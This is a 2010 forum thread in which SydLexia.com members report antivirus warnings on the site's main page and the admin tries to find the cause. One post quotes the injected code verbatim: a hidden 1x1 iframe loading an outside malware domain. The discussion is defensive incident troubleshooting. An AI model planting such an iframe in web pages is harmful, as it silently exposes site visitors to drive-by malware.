SydLexia.com Forum Index
"Stay awhile. Stay... FOREVER!"

  [Edit Profile]  [Search]  [Memberlist]  [Usergroups]  [FAQ]  [Register]
[Who's Online]  [Log in to check your private messages]  [Log in]
Potential Virus


Reply to topic
Author Message
LeshLush
Joined: Oct 19 2009
Location: Nashville, TN
PostPosted: Jan 24 2010 02:30 pm Reply with quote Back to top

The last few times I've come to sydlexia.com, my Norton Internet Security freaks out about a temporary flash plugin that it suspects might be a high level threat. This only happens when I come to sydlexia.com. Has anyone else had experience with this? If it is at all meaningful, the potential threat is named plugin-typenow.swf, which brings up nothing on google.
View user's profileSend private message
Blackout
Title: Captain Oblivious
Joined: Sep 01 2007
Location: That Rainy State
PostPosted: Jan 24 2010 02:32 pm Reply with quote Back to top

Never had that one, but my pop up blocker likes to block the you have new messages feature.



 
View user's profileSend private messageAIM AddressYahoo MessengerMSN Messenger
UsaSatsui
Title: The White Rabbit
Joined: May 25 2008
Location: Hiding
PostPosted: Jan 24 2010 05:20 pm Reply with quote Back to top

I'm having Avast pick this up too.

1/24/2010 9:39:04 AM Valued Customer 1496 Sign of "JS:Pdfka-gen [Expl]" has been found in "C:\DOCUME~1\VALUED~1\LOCALS~1\Temp\plugtmp-63\plugin-oneThis.pdf" file.

I only got it twice, both in the morning around 9:30, both when I went to the main page.

EDIT: I did some searching around. It's a Javascript exploit (which probably any idiot who noticed the "JS" could have told you), it downloads other malware remotely once it hits your PC, and it's one that apparently has caused false positives on Avast before. It also doesn't seem to trigger in the evening. So...
View user's profileSend private message
Alowishus
Joined: Aug 04 2009
PostPosted: Jan 24 2010 05:57 pm Reply with quote Back to top

That's weird... I have been getting one too.

It gives some website URL but i just ignore it.
View user's profileSend private message
TheThunderThief
Joined: Jun 07 2009
Location: Ditka's Moustache
PostPosted: Jan 24 2010 06:52 pm Reply with quote Back to top

I'm picking this up as well from AVG on the main page.


Image
 
View user's profileSend private messageAIM AddressMSN Messenger
JStrangiato
Title: El Hombre Strangiato
Joined: Jun 12 2007
Location: Texas
PostPosted: Jan 24 2010 07:05 pm Reply with quote Back to top

I went to the main page and didn't get anything. I was only on it for a few seconds, though.


My music/humor blog (R.I.P.): http://lavidastrangiato.blogspot.com/
Chondra "Mrs. Claudio" Sanchez on Enshin a.k.a. Jake Strangiato wrote:
I really like this person.

 
View user's profileSend private messageVisit poster's website
Optimist With Doubts
Title: Titlating
Joined: Dec 17 2007
PostPosted: Jan 24 2010 09:06 pm Reply with quote Back to top

Yeah avast picked it up for me.


Image
 
View user's profileSend private messageAIM AddressYahoo Messenger
Syd Lexia
Site Admin
Title: Pop Culture Junkie
Joined: Jul 30 2005
Location: Wakefield, MA
PostPosted: Jan 24 2010 09:11 pm Reply with quote Back to top

Goddammit. Is it happening on any pages besides the main page?
View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
Hacker
Banned
Joined: Sep 13 2008
PostPosted: Jan 24 2010 09:18 pm Reply with quote Back to top

hm... I was going to suggest maybe its detecting the javascript used for the "super C" easter egg but if it was why didnt it happen until today



 
View user's profileSend private message
JoshWoodzy
Joined: May 22 2008
Location: Goshen, VA
PostPosted: Jan 24 2010 09:19 pm Reply with quote Back to top

I only saw it pop up on the main page.


Image
 
View user's profileSend private messageAIM Address
Syd Lexia
Site Admin
Title: Pop Culture Junkie
Joined: Jul 30 2005
Location: Wakefield, MA
PostPosted: Jan 24 2010 09:24 pm Reply with quote Back to top

Is it gone? If so, I don't know why. I didn't do anything. But my computer tried to DL some sort of PDF when I went to the main page. Then I opened it in Dreamweaver and couldn't find any malicious code. Then I went back to the main page and it seemed fixed...
View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
UsaSatsui
Title: The White Rabbit
Joined: May 25 2008
Location: Hiding
PostPosted: Jan 24 2010 09:28 pm Reply with quote Back to top

It seems like it's not something that happens every time.
View user's profileSend private message
Syd Lexia
Site Admin
Title: Pop Culture Junkie
Joined: Jul 30 2005
Location: Wakefield, MA
PostPosted: Jan 24 2010 09:30 pm Reply with quote Back to top

You guys can double check, but there's nothing in the index.html file that should be doing it. I just overwrote the HTACCESS file as well, in case someone had fucked with that.
View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
JoshWoodzy
Joined: May 22 2008
Location: Goshen, VA
PostPosted: Jan 24 2010 09:55 pm Reply with quote Back to top

It doesn't seem to be popping up anymore. I saw it only once and that was today around lunchtime.


Image
 
View user's profileSend private messageAIM Address
Syd Lexia
Site Admin
Title: Pop Culture Junkie
Joined: Jul 30 2005
Location: Wakefield, MA
PostPosted: Jan 24 2010 09:58 pm Reply with quote Back to top

I'm freaked out now. Did whoever hacked it change it back? Did my webhost fix it? Was it a problem with the webhost to begin with?

I've changed my FTP user/password YET AGAIN just to be safe...
View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
lavalarva
2011 SNES Champ
Joined: Dec 04 2006
PostPosted: Jan 24 2010 10:17 pm Reply with quote Back to top

AVG found something on the news page. Unfortunately, it's in German because I don't know how to change it, so I don't know what it was.
View user's profileSend private message
JStrangiato
Title: El Hombre Strangiato
Joined: Jun 12 2007
Location: Texas
PostPosted: Jan 24 2010 11:34 pm Reply with quote Back to top

I went to the page at around 7:00, everything seemed A-OK. Is it just me, or does it seems like the site's been getting a lot of viruses lately? I don't remember it being this bad before.


My music/humor blog (R.I.P.): http://lavidastrangiato.blogspot.com/
Chondra "Mrs. Claudio" Sanchez on Enshin a.k.a. Jake Strangiato wrote:
I really like this person.

 
View user's profileSend private messageVisit poster's website
UsaSatsui
Title: The White Rabbit
Joined: May 25 2008
Location: Hiding
PostPosted: Jan 24 2010 11:37 pm Reply with quote Back to top

I'm not getting anything, but when I go to the main page, it's kicking me down to the bottom of it.
View user's profileSend private message
Captain_Pollution
Title: Hugh
Joined: Sep 23 2007
PostPosted: Jan 24 2010 11:38 pm Reply with quote Back to top

Yeah, that happened to me, too. I'm not picking up any viruses, though.


<Drew_Linky> Well, I've eaten vegetables all of once in my life.

 
View user's profileSend private message
Hacker
Banned
Joined: Sep 13 2008
PostPosted: Jan 24 2010 11:43 pm Reply with quote Back to top

UsaSatsui wrote:
I'm not getting anything, but when I go to the main page, it's kicking me down to the bottom of it.

Same here

EDIT: Theres a small square at the bottom of the main page and this is the source for it
<iframe src="http://todaylost.com/sv/index.php" width="1" frameborder="1" height="1"></iframe>



 
View user's profileSend private message
Hacker
Banned
Joined: Sep 13 2008
PostPosted: Jan 24 2010 11:53 pm Reply with quote Back to top

Oh it should be noted that that code is at the bottom of the HTML code for the main page



 
View user's profileSend private message
LeshLush
Joined: Oct 19 2009
Location: Nashville, TN
PostPosted: Jan 25 2010 12:10 am Reply with quote Back to top

I also am being shot down to the middle of the page and looking at a small grey square. I'm not getting any warnings from Norton, though.
View user's profileSend private message
Hacker
Banned
Joined: Sep 13 2008
PostPosted: Jan 25 2010 01:16 am Reply with quote Back to top

I shot Syd a PM of what i found and it seems to be fixed



 
View user's profileSend private message
JStrangiato
Title: El Hombre Strangiato
Joined: Jun 12 2007
Location: Texas
PostPosted: Jan 25 2010 01:38 am Reply with quote Back to top

Hacker wrote:
I shot Syd a PM of what i found and it seems to be fixed

You know, for all the shit-talking that Hacker goes through, he seems to me one hell of a wiz at situations like this, if it really is fixed.


My music/humor blog (R.I.P.): http://lavidastrangiato.blogspot.com/
Chondra "Mrs. Claudio" Sanchez on Enshin a.k.a. Jake Strangiato wrote:
I really like this person.

 
View user's profileSend private messageVisit poster's website
Captain_Pollution
Title: Hugh
Joined: Sep 23 2007
PostPosted: Jan 25 2010 01:48 am Reply with quote Back to top

Isn't fixed for me, and as we've already established, it seems to randomly not happen, sometimes.


<Drew_Linky> Well, I've eaten vegetables all of once in my life.

 
View user's profileSend private message
Display posts from previous:      
Reply to topic

 
 Jump to: